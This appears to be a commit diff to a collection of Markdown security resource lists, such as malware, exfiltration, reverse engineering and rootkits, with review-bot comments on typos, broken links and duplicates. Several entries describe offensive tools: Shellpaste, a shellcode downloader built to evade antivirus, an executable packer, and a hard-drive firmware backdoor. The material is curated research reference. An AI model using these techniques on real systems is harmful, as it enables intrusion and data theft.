* Abstract —The web has become an essential part of our society and is currently the main medium of information delivery. Billions of users browse the web on a daily basis, and there are single websites that have reached over one billion user accounts. In this environment, the ability to track users and their online habits can be very lucrative for advertising companies, yet very intrusive for the privacy of users. In this paper, we examine how web-based device fingerprint- ing currently works on the Internet. By analyzing the code of three popular browser-fingerprinting code providers, we reveal the techniques that allow websites to track users without the need of client-side identifiers. Among these techniques, we show how current commercial fingerprinting approaches use questionable practices, such as the circumvention of HTTP proxies to discover a user’s real IP address and the installation of intrusive browser plugins. At the same time, we show how fragile the browser ecosystem is against fingerprinting through the use of novel browser- identifying techniques. With so many different vendors involved in browser development, we demonstrate how one can use diversions in the browsers’ implementation to distinguish successfully not only the browser-family, but also specific major and minor versions. Browser extensions that help users spoof the user-agent of their browsers are also evaluated. We show that current commercial approaches can bypass the extensions, and, in addition, take advantage of their shortcomings by using them as additional fingerprinting features.
###Guides/Write-ups
###Blogs/Sites
Detecting Surveillance - Spiderlabs blog
[1 Hardware Implants](http://blog.spiderlabs.com/2014/03/detecting-surveillance-state-surveillance-part-1-hardware-impants.html)
[2 Radio Frequency Exfiltration](http://blog.spiderlabs.com/2014/03/detecting-a-surveillance-state-part-2-radio-frequency-exfiltration.html)
[3 Infected Firmware](http://blog.spiderlabs.com/2014/04/detecting-a-surveillance-state-part-3-infected-firmware.html)
* [1 Hardware Implants](http://blog.spiderlabs.com/2014/03/detecting-surveillance-state-surveillance-part-1-hardware-impants.html)
* [2 Radio Frequency Exfiltration](http://blog.spiderlabs.com/2014/03/detecting-a-surveillance-state-part-2-radio-frequency-exfiltration.html)
* [3 Infected Firmware](http://blog.spiderlabs.com/2014/04/detecting-a-surveillance-state-part-3-infected-firmware.html)
[A Simple Guide to TSCM Sweeps](http://www.international-intelligence.co.uk/tscm-sweep-guide.html)
###Videos
[Dr. Philip Polstra - Am I Being Spied On?](https://www.youtube.com/watch?v=Bc7WoDXhcjM)
* Talk on cheap/free counter measures
[DNS May Be Hazardous to Your Health - Robert Stucke](https://www.youtube.com/watch?v=ZPbyDSvGasw)
* Great talk on attacking DNS
[CounterStrike Lawful Interception](https://www.youtube.com/watch?v=7HXLaRWk1SM)
* This short talk will cover the standards, devices and implementation of a mandatory part of our western Internet infrastructure. The central question is whether an overarching interception functionality might actually put national Internet infrastructure at a higher risk of being attacked successfully. The question is approached in this talk from a purely technical point of view, looking at how LI functionality is implemented by a major vendor and what issues arise from that implementation. Routers and other devices may get hurt in the process.
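Review bot: The headings `###Cull`, `###Guides/Write-ups`, `###Blogs/Sites` and `###Videos` have no space after the hashes, so CommonMark renderers (GitHub's included) show them as literal text rather than headings; write `### Cull` and so on. `###Guides/Write-ups` is also left empty, since the Spiderlabs series sits under `###Blogs/Sites` immediately below it; either drop the empty heading or move an entry under it. The pasted Cookieless Monster abstract still carries PDF line-break hyphens (`fingerprint- ing`, `browser- identifying`); joining those words keeps the entry readable and searchable.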
@ -69,6 +55,21 @@ Detecting Surveillance - Spiderlabs blog
[Exploiting Lawful Intercept to Wiretap the Internet](https://www.blackhat.com/presentations/bh-dc-10/Cross_Tom/BlackHat-DC-2010-Cross-Attacking-LawfulI-Intercept-wp.pdf)
* This paper will review Cisco's architecture for lawful intercept from asecurity perspective. We explain how a number of different weaknesses in its design coupled with publicly disclosed security vulnerabilities could enable a malicious person to access the interface and spy on communications without leaving a trace. We then provide a set of recommendations for the redesign of the interface as well as SNMP authentication in general to better mitigate the security risks.
S
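Review bot: `from asecurity perspective` in the Lawful Intercept description is missing a space (`a security`). The trailing line containing only `S` looks like a leftover fragment and should be removed before merge.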


Draft/Draft/Courses & Training.md → Draft/Draft/Courses & Training -.md


Draft/Draft/Darknets.md → Draft/Draft/Darknets -.md


+ 82
- 0
Draft/Draft/Data AnalysisVisualization.md

@ -0,0 +1,82 @@
##Data Visualization
ToC
Check out http://secviz.org/
http://sourceforge.net/projects/rapidminer/#
http://orange.biolab.si/
https://rapidminer.com/
http://ipython.org/
[*ORA](http://www.casos.cs.cmu.edu/projects/ora/)
* *ORA is a dynamic meta-network assessment and analysis tool developed by CASOS at Carnegie Mellon. It contains hundreds of social network, dynamic network metrics, trail metrics, procedures for grouping nodes, identifying local patterns, comparing and contrasting networks, groups, and individuals from a dynamic meta-network perspective. *ORA has been used to examine how networks change through space and time, contains procedures for moving back and forth between trail data (e.g. who was where when) and network data (who is connected to whom, who is connected to where …), and has a variety of geo-spatial network metrics, and change detection techniques. *ORA can handle multi-mode, multi-plex, multi-level networks. It can identify key players, groups and vulnerabilities, model network changes over time, and perform COA analysis. It has been tested with large networks (106 nodes per 5 entity classes).Distance based, algorithmic, and statistical procedures for comparing and contrasting networks are part of this toolkit. Based on network theory, social psychology, operations research, and management theory a series of measures of “criticality” have been developed at CMU. Just as critical path algorithms can be used to locate those tasks that are critical from a project management perspective, the *ORA algorithms can find those people, types of skills or knowledge and tasks that are critical from a performance and information security perspective.
[Data Science Toolkit](https://github.com/petewarden/dstk)
* A collection of the best open data sets and open-source tools for data science, wrapped in an easy-to-use REST/JSON API with command line, Python and Javascript interfaces. Available as a self-contained VM or EC2 AMI that you can deploy yourself.
* [Documentation](http://www.datasciencetoolkit.org/developerdocs)
[Import.IO](https://import.io/)
* Use our tool to build APIs to all your favorite websites with just a few clicks of the mouse. - Data Scraping
https://www.documentcloud.org/home
http://www.pentaho.com/
[d3js(Data Driven Documents)](http://d3js.org/)
* D3.js is a JavaScript library for manipulating documents based on data. D3 helps you bring data to life using HTML, SVG, and CSS. D3’s emphasis on web standards gives you the full capabilities of modern browsers without tying yourself to a proprietary framework, combining powerful visualization components and a data-driven approach to DOM manipulation.
[Drawing effective network diagrams](https://www.auvik.com/media/blog/effective-network-diagrams/)
[Data Maps](https://datamaps.github.io/)
* Customizable SVG map visualizations for the web in a single Javascript file using D3.js
[Using amCharts to Create Beautiful Wireshark Visualizations](http://www.thevisiblenetwork.com/2015/03/19/using-amcharts-to-create-beautiful-wireshark-visualizations/)
[pewpew](https://github.com/hrbrmstr/pewpew)
* In all seriousness, IPew provides a simple framework - based on Datamaps - for displaying cartographic attack data in a (mostly) responsive way and shows how to use dynamic data via javascript event timers and data queues (in case you're here to learn vs have fun - or both!). You can customize the display through a myriad of query string options, including sounds.
Applied Security Visualization: http://www.secviz.org/content/applied-security-visualization
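Review bot: The bullet `* *ORA is a dynamic meta-network assessment ...` opens an emphasis span with its second asterisk that is never closed, so the description renders in italics or with a stray `*` depending on the renderer; escape it as `* \*ORA is ...`. The file also mixes conventions: `http://sourceforge.net/projects/rapidminer/#`, `https://rapidminer.com/`, `http://orange.biolab.si/`, `http://ipython.org/`, `https://www.documentcloud.org/home` and `http://www.pentaho.com/` are bare URLs with no title or one-line summary like the other entries, and RapidMiner is listed twice (SourceForge and rapidminer.com). `##Data Visualization` needs a space after the hashes to render as a heading, `ToC` is a placeholder with no entries, and `106 nodes per 5 entity classes` in the *ORA text has most likely lost a superscript (10^6); worth checking against the CASOS page before keeping it.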

+ 0
- 23
Draft/Draft/Data Visualization.md

@ -1,23 +0,0 @@
##Data Visualization
Check out http://secviz.org/
d3js
[d3js(Data Driven Documents)](http://d3js.org/)
* D3.js is a JavaScript library for manipulating documents based on data. D3 helps you bring data to life using HTML, SVG, and CSS. D3’s emphasis on web standards gives you the full capabilities of modern browsers without tying yourself to a proprietary framework, combining powerful visualization components and a data-driven approach to DOM manipulation.
[Drawing effective network diagrams](https://www.auvik.com/media/blog/effective-network-diagrams/)
[Data Maps](https://datamaps.github.io/)
* Customizable SVG map visualizations for the web in a single Javascript file using D3.js
[Using amCharts to Create Beautiful Wireshark Visualizations](http://www.thevisiblenetwork.com/2015/03/19/using-amcharts-to-create-beautiful-wireshark-visualizations/)
[pewpew](https://github.com/hrbrmstr/pewpew)
* In all seriousness, IPew provides a simple framework - based on Datamaps - for displaying cartographic attack data in a (mostly) responsive way and shows how to use dynamic data via javascript event timers and data queues (in case you're here to learn vs have fun - or both!). You can customize the display through a myriad of query string options, including sounds.
Applied Security Visualization: http://www.secviz.org/content/applied-security-visualization
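Review bot: Every entry removed here (secviz, d3js, Drawing effective network diagrams, Data Maps, amCharts, pewpew, Applied Security Visualization) reappears in the new `Data AnalysisVisualization.md`, so this is really a rename plus additions; because the file grew from 23 to 82 lines Git did not pair the two as a rename, which severs this file's history. Doing the rename in one commit and the additions in another keeps `git log --follow` working. The new name also lacks a separator between `Analysis` and `Visualization`.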

Draft/Draft/Embedded Device & Hardware Hacking.md → Draft/Draft/Embedded Device & Hardware Hacking -.md


+ 9
- 0
Draft/Draft/Exfiltration.md

@ -34,3 +34,12 @@ Draft emails
Stunnel
###Papers
[Self-Exfiltration: The Dangers of Browser-Enforced Information Flow Control](http://ericchen.me/self_exfiltration.pdf)
* Abstract —Since the early days of Netscape, browser vendors and web security researchers have restricted out-going data based on its destination. The security argument accompanying these mechanisms is that they prevent sensitive user data from being sent to the attacker’s domain. However, in this paper, we show that regulating web information flow based on its destination server is an inherently flawed security practice. It is vulnerable to self-exfiltration attacks, where an adversary stashes stolen information in the database of a whitelisted site, then later independently connects to the whitelisted site to retrieve the information. We describe eight existing browser security mechanisms that are vulnerable to these “self-exfiltration” attacks. Furthermore, we discovered at least one exfiltration channel for each of the Alexa top 100 websites. None of the existing information flow control mechanisms we surveyed are sufficient to protect data from being leaked to the attacker. Our goal is to prevent browser vendors and researchers from falling into this trap by designing more systems that are vulnerable to self-exfiltration.
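Review bot: `Draft emails` and `Stunnel` above the new `###Papers` heading are bare labels with neither a link nor a description, unlike every other entry in the hunk; either link them or mark them as to-do. `###Papers` also needs a space after the hashes to render as a heading.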

+ 6
- 1
Draft/Draft/Exploit Development.md

@ -35,6 +35,11 @@ Exploit dev -
###Cull
[The Userland Exploits of Pangu 8](http://blog.pangu.io/wp-content/uploads/2015/03/CanSecWest2015_Final.pdf)
[OllyDbg Tricks for Exploit Development](http://resources.infosecinstitute.com/in-depth-seh-exploit-writing-tutorial-using-ollydbg/)
@ -47,7 +52,7 @@ When run on a machine vulnerable to the rowhammer problem, the process was able
https://github.com/demi6od/Smashing_The_Browser
[Subverting PatchGuard Version 2](http://uninformed.org/?v=all&a=28&t=sumry)
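Review bot: `https://github.com/demi6od/Smashing_The_Browser` is a bare URL with no title or summary while the neighbouring entries use `[title](url)` plus a `*` description line; give it the same form so it is discoverable by name.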


+ 5
- 1
Draft/Draft/Forensics Incident Response/add cull.txt

@ -16,13 +16,17 @@
[Extensible Metadata Platform](https://en.wikipedia.org/wiki/Extensible_Metadata_Platform)
* The Extensible Metadata Platform (XMP) is an ISO standard, originally created by Adobe Systems Inc., for the creation, processing and interchange of standardized and custom metadata for digital documents and data sets.
[Firmware Forensics: Diffs, Timelines, ELFs and Backdoors](http://w00tsec.blogspot.com/2015/02/firmware-forensics-diffs-timelines-elfs.html)
[Real-time Steganography with RTP](http://uninformed.org/?v=all&a=36&t=sumry)
* Real-time Transfer Protocol (RTP) is used by nearly all Voice-over-IP systems to provide the audio channel for calls. As such, it provides ample opportunity for the creation of a covert communication channel due to its very nature. While use of steganographic techniques with various audio cover-medium has been extensively researched, most applications of such have been limited to audio cover-medium of a static nature such as WAV or MP3 file audio data. This paper details a common technique for the use of steganography with audio data cover-medium, outlines the problem issues that arise when attempting to use such techniques to establish a full-duplex communications channel within audio data transmitted via an unreliable streaming protocol, and documents solutions to these problems. An implementation of the ideas discussed entitled SteganRTP is included in the reference materials.
[Windows Memory Analysis Checklist](http://www.dumpanalysis.org/windows-memory-analysis-checklist)
[MozillaRecovery](https://github.com/gtfy/MozillaRecovery)
* Recovers the master password of key3.db files, i.e. Thunderbird, Firefox
[Exfil Framework](https://github.com/reservoirlabs/bro-scripts/tree/master/exfil-detection-framework)
* The Exfil Framework is a suite of Bro scripts that detect file uploads in TCP connections. The Exfil Framework can detect file uploads in most TCP sessions including sessions that have encrypted payloads (SCP,SFTP,HTTPS).
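Review bot: The MozillaRecovery description uses `i.e. Thunderbird, Firefox` where `e.g.` is meant (those are examples of applications that use key3.db, not a definition). In the Exfil Framework line, `including sessions that have encrypted payloads` should say what the scripts look at when the payload cannot be inspected, so readers do not assume it decrypts traffic. The RTP steganography paper (a covert channel) and the Exfil Framework (a Bro detection ruleset) fit the Exfiltration or NSM pages better than a forensics cull list.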


+ 4
- 0
Draft/Draft/Fuzzing Bug Hunting.md

@ -16,6 +16,10 @@ Miscellaneous
[afl-dyninst ; AFL Fuzzing blackbox binaries](https://github.com/vrtadmin/moflow/tree/master/afl-dyninst)
* American Fuzzy Lop + Dyninst == AFL Fuzzing blackbox binaries The tool has two parts. The instrumentation tool and the instrumentation library. Instrumentation library has an initialization callback and basic block callback functions which are designed to emulate what AFL is doing with afl-gcc/afl-g++/afl-as. Instrumentation tool (afl-dyninst) instruments the supplied binary by inserting callbacks for each basic block and an initialization callback either at _init or at specified entry point.
http://nullcon.net/website/archives/ppt/goa-15/analyzing-chrome-crash-reports-at-scale-by-abhishek-arya.pdf
[browserfuzz](https://bitbucket.org/blackaura/browserfuzz)
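Review bot: The afl-dyninst description runs two sentences together: `American Fuzzy Lop + Dyninst == AFL Fuzzing blackbox binaries The tool has two parts.`; add a period or line break after `binaries`. `browserfuzz` has no description and the nullcon slides are a bare URL; both should get a title and a one-line summary like the entries above them.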


+ 3
- 0
Draft/Draft/Honeypots -.md

@ -55,6 +55,9 @@ Beeswarm](http://www.beeswarm-ids.org/)
[dionea](http://dionaea.carnivore.it/)
* dionaea intention is to trap malware exploiting vulnerabilities exposed by services offerd to a network, the ultimate goal is gaining a copy of the malware.
[Kippo](https://github.com/desaster/kippo)
* Kippo is a medium interaction SSH honeypot designed to log brute force attacks and, most importantly, the entire shell interaction performed by the attacker.
[Glastopf Project](http://glastopf.org/)
* Glastopf is a Honeypot which emulates thousands of vulnerabilities to gather data from attacks targeting web applications. The principle behind it is very simple: Reply the correct response to the attacker exploiting the web application. The project has been kicked off by Lukas Rist in 2009 and the results we are got during this time are very promising and are an incentive to put even more effort in the development of this unique tool. Read the tool description for further information. We are working together with different people, organizations and institutions to get the best from the collected data. Find out more about collaborating with the project.
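Review bot: The link text `[dionea]` misspells the project name; its own description and URL spell it `dionaea`, and `offerd` on the same line should be `offered`. In the Glastopf description `the results we are got during this time` should be `the results we got during this time`, and `Reply the correct response` reads better as `Return the correct response`. The context line `Beeswarm](http://www.beeswarm-ids.org/)` above the hunk is missing its opening `[`; pre-existing, but cheap to fix while here.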


Draft/Draft/Lockpicking.md → Draft/Draft/Lockpicking -.md


+ 20
- 0
Draft/Draft/Logging - Combine with NSM.md

@ -3,10 +3,30 @@
ELK Stack
Logstash/Kibana Elastic Search
[Graphite - Scalable Realtime Graphing](http://graphite.wikidot.com/start)
* [Quick Start Guide](http://graphite.wikidot.com/quickstart-guide)
[Syslong-ng](https://github.com/balabit/syslog-ng)
* syslog-ng is an enhanced log daemon, supporting a wide range of input and output methods: syslog, unstructured text, message queues, databases (SQL and NoSQL alike) and more.
[logstash anonymize](http://logstash.net/docs/1.4.2/filters/anonymize)
* Anonymize fields using by replacing values with a consistent hash.
[StatsD](https://github.com/etsy/statsd/)
* A network daemon that runs on the Node.js platform and listens for statistics, like counters and timers, sent over UDP or TCP and sends aggregates to one or more pluggable backend services (e.g., Graphite).
[Spotting the Adversary with Windows Event Log Monitoring - NSA](https://www.nsa.gov/ia/_files/app/Spotting_the_Adversary_with_Windows_Event_Log_Monitoring.pdf)
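Review bot: `[Syslong-ng]` misspells `syslog-ng` (the URL and the description spell it correctly). `Anonymize fields using by replacing values with a consistent hash.` should drop `using`. The logstash anonymize link is pinned to the 1.4.2 docs, so note the version in the entry or it will silently go stale. `ELK Stack` and `Logstash/Kibana Elastic Search` at the top of the hunk are bare labels with no link or description.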


+ 5
- 0
Draft/Draft/Malware.md

@ -9,6 +9,11 @@
[Shellpaste](https://github.com/andrew-morris/shellpaste)
* Tiny snippet of code that pulls ASCII shellcode from pastebin and executes it. The purpose of this is to have a minimal amount of benign code so AV doesn't freak out, then it pulls down the evil stuff. People have been doing this kind of stuff for years so I take no credit for the concept. That being said, this code (or similar code) works surprisingly often during pentests when conventional malware fails.
[Locreate: An Anagram for Relocate ](http://uninformed.org/?v=all&a=30&t=sumry)
* This paper presents a proof of concept executable packer that does not use any custom code to unpack binaries at execution time. This is different from typical packers which generally rely on packed executables containing code that is used to perform the inverse of the packing operation at runtime. Instead of depending on custom code, the technique described in this paper uses documented behavior of the dynamic loader as a mechanism for performing the unpacking operation. This difference can make binaries packed using this technique more difficult to signature and analyze, but only when presented to an untrained eye. The description of this technique is meant to be an example of a fun thought exercise and not as some sort of revolutionary packer. In fact, it's been used in the virus world many years prior to this paper.
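Review bot: The Shellpaste entry and its full description are added here and twice more in `Programming - Languages Libs Courses References.md` in this same commit; keep one canonical copy (Malware is the natural home for a downloader stub) and drop or cross-link the others.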


+ 34
- 21
Draft/Draft/Programming - Languages Libs Courses References.md

@ -15,12 +15,13 @@ Python
###Cull
[Secure Coding Standards - Android](https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=111509535)
[Understanding Python Bytecode](http://security.coverity.com/blog/2014/Nov/understanding-python-bytecode.html)
[Obfuscating python](https://reverseengineering.stackexchange.com/questions/1943/what-are-the-techniques-and-tools-to-obfuscate-python-programs)
[Secure Coding Standards - Android](https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=111509535)
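Review bot: `Secure Coding Standards - Android` appears as both the first and last line of this hunk; if both survive the change, remove one. `Understanding Python Bytecode` and `Obfuscating python` are added under `###Cull` here and again under `###Python` later in the same file; one location is enough.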
@ -33,18 +34,15 @@ Python
* Introduction for those who don’t know ASM and a reference for those that do.
[WinAppDbg](http://winappdbg.sourceforge.net/)
* The WinAppDbg python module allows developers to quickly code instrumentation scripts in Python under a Windows environment. It uses ctypes to wrap many Win32 API calls related to debugging, and provides a powerful abstraction layer to manipulate threads, libraries and processes, attach your script as a debugger, trace execution, hook API calls, handle events in your debugee and set breakpoints of different kinds (code, hardware and memory). Additionally it has no native code at all, making it easier to maintain or modify than other debuggers on Windows. The intended audience are QA engineers and software security auditors wishing to test or fuzz Windows applications with quickly coded Python scripts. Several ready to use tools are shipped and can be used for this purposes. Current features also include disassembling x86/x64 native code, debugging multiple processes simultaneously and produce a detailed log of application crashes, useful for fuzzing and automated testing.
[Killing the Rootkit](http://blog.ioactive.com/2014/09/killing-rootkit.html)
[Slides - Weird - Machine Motivated Practical Page Table Shellcode & Finding Out What's Running on Your System](https://www.defcon.org/images/defcon-22/dc-22-presentations/Macaulay/DEFCON-22-Shane-Macaulay-Weird-Machine-Motivated-Practical-Page-Table-Shellcode-UPDATED.pdf)
###General
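Review bot: `Killing the Rootkit` and the `Weird Machine ... Page Table Shellcode` slides are rootkit and kernel material that sit oddly in a programming-references file, and `Killing the Rootkit` is also added to `Rootkits.md` in this commit, so this copy can go. The WinAppDbg paragraph here is identical to the one added to `Reverse Engineering.md`; pick one home for it.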
@ -80,33 +78,40 @@ http://opensecuritytraining.info/IntroX86.html
[x86 Disassembly/Calling Conventions](https://en.wikibooks.org/wiki/X86_Disassembly/Calling_Conventions)
[x86 Disassembly/Calling Convention Examples](https://en.wikibooks.org/wiki/X86_Disassembly/Calling_Convention_Examples)
[Walkthrough: Creating and Using a Dynamic Link Library (C++)](https://msdn.microsoft.com/en-us/library/ms235636.aspx)
###Source Code Analysis
[RIPS]http://rips-scanner.sourceforge.net/)
* RIPS is a tool written in PHP to find vulnerabilities in PHP applications using static code analysis. By tokenizing and parsing all source code files RIPS is able to transform PHP source code into a program model and to detect sensitive sinks (potentially vulnerable functions) that can be tainted by user input (influenced by a malicious user) during the program flow. Besides the structured output of found vulnerabilities RIPS also offers an integrated code audit framework for further manual analysis.
Videos
###Videos
[Introduction Video Series(6) to x86 Assembly](https://www.youtube.com/watch?v=qn1_dRjM6F0&list=PLPXsMt57rLthf58PFYE9gOAsuyvs7T5W9)
Papers
###Papers
[Mov is turing complete](http://www.cl.cam.ac.uk/~sd601/papers/mov.pdf)
###C
[Stanford C 101](http://cslibrary.stanford.edu/101/EssentialC.pdf)
* Stanford CS Education Library: A 45 page summary of the C language. Explains all the common features and techniques for the C language. The coverage is pretty quick, so it is most appropriate for someone with some programming background who needs to see how C works. Topics include variables, int types, floating point types, promotion, truncation, operators, control structures (if, while, for), functions, value parameters, reference parameters, structs, pointers, arrays, the pre-processor, and the standard C library functions. (revised 4/2003)
[Homepage](http://cslibrary.stanford.edu/101/)
Stanford C 101
Stanford CS Education Library: A 45 page summary of the C language. Explains all the common features and techniques for the C language. The coverage is pretty quick, so it is most appropriate for someone with some programming background who needs to see how C works. Topics include variables, int types, floating point types, promotion, truncation, operators, control structures (if, while, for), functions, value parameters, reference parameters, structs, pointers, arrays, the pre-processor, and the standard C library functions. (revised 4/2003)
http://cslibrary.stanford.edu/101/
http://cslibrary.stanford.edu/101/EssentialC.pdf
[Stanford C Pointers and Memory](http://cslibrary.stanford.edu/102/PointersAndMemory.pdf)
* Stanford CS Education Library: a 31 page introduction to programming with pointers and memory in C, C++ and other languages. Explains how pointers and memory work and how to use them -- from the basic concepts through all the major programming techniques. Can be used as an introduction to pointers for someone with basic programming experience or as a quick review. Many advanced programming and debugging problems only make sense with a solid understanding of pointers and memory -- this document tries to provide that understanding.
* [Homepage](http://cslibrary.stanford.edu/102/)
Stanford C Pointers and Memory
Stanford CS Education Library: a 31 page introduction to programming with pointers and memory in C, C++ and other languages. Explains how pointers and memory work and how to use them -- from the basic concepts through all the major programming techniques. Can be used as an introduction to pointers for someone with basic programming experience or as a quick review. Many advanced programming and debugging problems only make sense with a solid understanding of pointers and memory -- this document tries to provide that understanding.
http://cslibrary.stanford.edu/102/
http://cslibrary.stanford.edu/102/PointersAndMemory.pdf
###Python
[Hachoir](https://bitbucket.org/haypo/hachoir/wiki/Home)
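Review bot: `[RIPS]http://rips-scanner.sourceforge.net/)` is missing the `(` after `]`, so it renders as literal text instead of a link; it should be `[RIPS](http://rips-scanner.sourceforge.net/)`. Both `Videos` and `###Videos`, and both `Papers` and `###Papers`, appear in the hunk, as do plain-text and bulleted versions of the two Stanford C entries; if the plain versions are the removed lines this is fine, otherwise the duplicates need to go. For consistency, the `[Homepage]` link under Stanford C 101 should be indented with `* ` like the one under Pointers and Memory.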
@ -114,8 +119,9 @@ http://cslibrary.stanford.edu/102/PointersAndMemory.pdf
[Python Library for interacting with Serial Ports](http://pyserial.sourceforge.net/)
[Shellpaste](https://github.com/andrew-morris/shellpaste)
* Tiny snippet of code that pulls ASCII shellcode from pastebin and executes it. The purpose of this is to have a minimal amount of benign code so AV doesn't freak out, then it pulls down the evil stuff. People have been doing this kind of stuff for years so I take no credit for the concept. That being said, this code (or similar code) works surprisingly often during pentests when conventional malware fails.
[Understanding Python Bytecode](http://security.coverity.com/blog/2014/Nov/understanding-python-bytecode.html)
[Obfuscating python](https://reverseengineering.stackexchange.com/questions/1943/what-are-the-techniques-and-tools-to-obfuscate-python-programs)
[Equip: python bytecode instrumentation](https://github.com/neuroo/equip)
* equip is a small library that helps with Python bytecode instrumentation. Its API is designed to be small and flexible to enable a wide range of possible instrumentations. The instrumentation is designed around the injection of bytecode inside the bytecode of the program to be instrumented. However, the developer does not need to know anything about the Python bytecode since the injected code is Python source.
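Review bot: Shellpaste is added here with its full description and again under `###Useful Libraries/programs` in the next hunk of this file; keep a single entry. `Understanding Python Bytecode` and `Obfuscating python` duplicate the `###Cull` section at the top of this file.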
@ -143,3 +149,10 @@ $err = $ErrorSource + " reports: " + $ErrorMessage
}
"""
###Useful Libraries/programs
[Shellpaste](https://github.com/andrew-morris/shellpaste)
* Tiny snippet of code that pulls ASCII shellcode from pastebin and executes it. The purpose of this is to have a minimal amount of benign code so AV doesn't freak out, then it pulls down the evil stuff. People have been doing this kind of stuff for years so I take no credit for the concept. That being said, this code (or similar code) works surprisingly often during pentests when conventional malware fails.
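Review bot: The context lines `}` and `"""` show that the PowerShell snippet above this hunk is closed with a Python-style triple quote rather than a Markdown code fence, so in a `.md` file it renders as prose; wrap the snippet in triple-backtick fences (tagged `powershell`) so that `###Useful Libraries/programs` follows a properly closed block. The Shellpaste entry here is the third copy of the same text in this commit.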

+ 31
- 1
Draft/Draft/Reverse Engineering.md

@ -43,13 +43,20 @@ Wikis & Useful Sites
[SATCOM Terminals Hacking by Air, Sea, and Land - Black Hat USA 2014](https://www.youtube.com/watch?v=tRHDuT__GoM)
[Reverse Engineering Flash Memory for Fun and Benefit - BlackHat 2014](https://www.youtube.com/watch?v=E8BSnS4-Kpw)
[PE File Format Graphs](http://blog.dkbza.org/2012/08/pe-file-format-graphs.html?view=mosaic)
https://github.com/droidsec/droidsec.github.io/wiki/Android-Crackmes
[Bindead - static binary binary analysis tool](https://bitbucket.org/mihaila/bindead/wiki/Home)
* Bindead is an analyzer for executable machine code. It features a disassembler that translates machine code bits into an assembler like language (RREIL) that in turn is then analyzed by the static analysis component using abstract interpretation.
[Statically Linked Library Detector](https://github.com/arvinddoraiswamy/slid)
[BitBlaze](http://bitblaze.cs.berkeley.edu/)
* The BitBlaze project aims to design and develop a powerful binary analysis platform and employ the platform in order to (1) analyze and develop novel COTS protection and diagnostic mechanisms and (2) analyze, understand, and develop defenses against malicious code. The BitBlaze project also strives to open new application areas of binary analysis, which provides sound and effective solutions to applications beyond software security and malicious code defense, such as protocol reverse engineering and fingerprint generation.
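Review bot: `static binary binary analysis tool` doubles `binary` in the Bindead link text. `https://github.com/droidsec/droidsec.github.io/wiki/Android-Crackmes` is a bare URL and `Statically Linked Library Detector` has no description, unlike the surrounding entries. `PE File Format Graphs` is added both here and to `System Internals Windows and Linux Internals Reference.md` in the same commit; one location is enough.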
@ -72,6 +79,9 @@ https://github.com/droidsec/droidsec.github.io/wiki/Android-Crackmes
[Frida](http://www.frida.re/docs/home/)
* Inject JS into native apps
[Rdis](https://github.com/endeav0r/rdis)
* Rdis is a Binary Analysis Tool for Linux.
[Python RE tools list](http://pythonarsenal.erpscan.com/)
[Static binary analysis tool](https://github.com/bdcht/amoco)
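Review bot: The link text `Static binary analysis tool` for `https://github.com/bdcht/amoco` hides the project name; name it (`amoco`) so it can be found by name, and give it a one-line description as Rdis has.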
@ -86,6 +96,8 @@ Binwalk is a fast, easy to use tool for analyzing, reverse engineering, and extr
* Interactive code tracer for reverse-engineering proprietary software
####Frameworks
@ -110,6 +122,21 @@ Radare2 - unix-like reverse engineering framework and commandline tools ](http:/
[OllyDbg](http://www.ollydbg.de/)
* OllyDbg is a 32-bit assembler level analysing debugger for Microsoft® Windows®. Emphasis on binary code analysis makes it particularly useful in cases where source is unavailable.
[WinDbg](
*
*[Excellent Resource Site](http://www.windbg.org/)
*[Crash Dump Analysis Poster](http://www.dumpanalysis.org/CDAPoster.html)
* [Getting Started with WinDbg (User-Mode)](https://msdn.microsoft.com/en-us/library/windows/hardware/dn745911%28v=vs.85%29.aspx)
* [Getting Started with WinDbg (Kernel-Mode)](https://msdn.microsoft.com/en-us/library/windows/hardware/dn745912%28v=vs.85%29.aspx)
[WinAppDbg](http://winappdbg.sourceforge.net/)
* The WinAppDbg python module allows developers to quickly code instrumentation scripts in Python under a Windows environment. It uses ctypes to wrap many Win32 API calls related to debugging, and provides a powerful abstraction layer to manipulate threads, libraries and processes, attach your script as a debugger, trace execution, hook API calls, handle events in your debugee and set breakpoints of different kinds (code, hardware and memory). Additionally it has no native code at all, making it easier to maintain or modify than other debuggers on Windows. The intended audience are QA engineers and software security auditors wishing to test or fuzz Windows applications with quickly coded Python scripts. Several ready to use tools are shipped and can be used for this purposes. Current features also include disassembling x86/x64 native code, debugging multiple processes simultaneously and produce a detailed log of application crashes, useful for fuzzing and automated testing.
[Open Source Windows x86/x64 Debugger](http://x64dbg.com/)
[xnippet](https://github.com/isislab/xnippet)
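Review bot: `[WinDbg](` has an empty URL and the `*` bullet under it is empty, so this entry is unfinished; either fill in the URL or leave a visible TODO. `*[Excellent Resource Site]` and `*[Crash Dump Analysis Poster]` lack the space after `*`, so they will not render as list items while the two MSDN lines below them will. The WinAppDbg paragraph is identical to the one added to the Programming file in this commit; keep one copy.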
@ -132,6 +159,9 @@ programming environment.
* IDA Pomidor is a fun and simple plugin for the Hex-Ray's IDA Pro disassembler that will help you retain concentration and productivity during long reversing sessions.
[Hopper](http://www.hopperapp.com/)
* Hopper is a reverse engineering tool for OS X and Linux, that lets you disassemble, decompile and debug your 32/64bits Intel Mac, Linux, Windows and iOS executables!
* quote from a friend on irc: "IF u RLY like guis this is also a cheap option"
[Reverse](https://github.com/joelpx/reverse)


+ 9
- 0
Draft/Draft/Rootkits.md

@ -16,6 +16,13 @@ Papers
###Cull
[Implementation and Implications of a Stealth Hard-Drive Backdoor](https://www.ibr.cs.tu-bs.de/users/kurmus/papers/acsac13.pdf)
* Modern workstations and servers implicitly trust hard disks to act as well-behaved block devices. This paper analyzes the catastrophic loss of security that occurs when hard disks are not trustworthy. First, we show that it is possible to compromise the firmware of a commercial o -the-shelf hard drive, by resorting only to public information and reverse engineering. Using such a compromised firmware, we present a stealth rootkit that replaces arbitrary blocks from the disk while they are written, providing a data replacement back- door . The measured performance overhead of the compromised disk drive is less than 1% compared with a normal, non-malicious disk drive. We then demonstrate that a re- mote attacker can even establish a communication channel with a compromised disk to infiltrate commands and to ex-filtrate data. In our example, this channel is established over the Internet to an unmodified web server that relies on the compromised drive for its storage, passing through the original webserver, database server, database storage engine, filesystem driver, and block device driver. Additional experiments, performed in an emulated disk-drive environment, could automatically extract sensitive data such as /etc/shadow (or a secret key le) in less than a minute. This paper claims that the diffculty of implementing such an at- tack is not limited to the area of government cyber-warfare; rather, it is well within the reach of moderately funded criminals, botnet herders and academic researchers.
[Killing the Rootkit](http://blog.ioactive.com/2014/09/killing-rootkit.html)
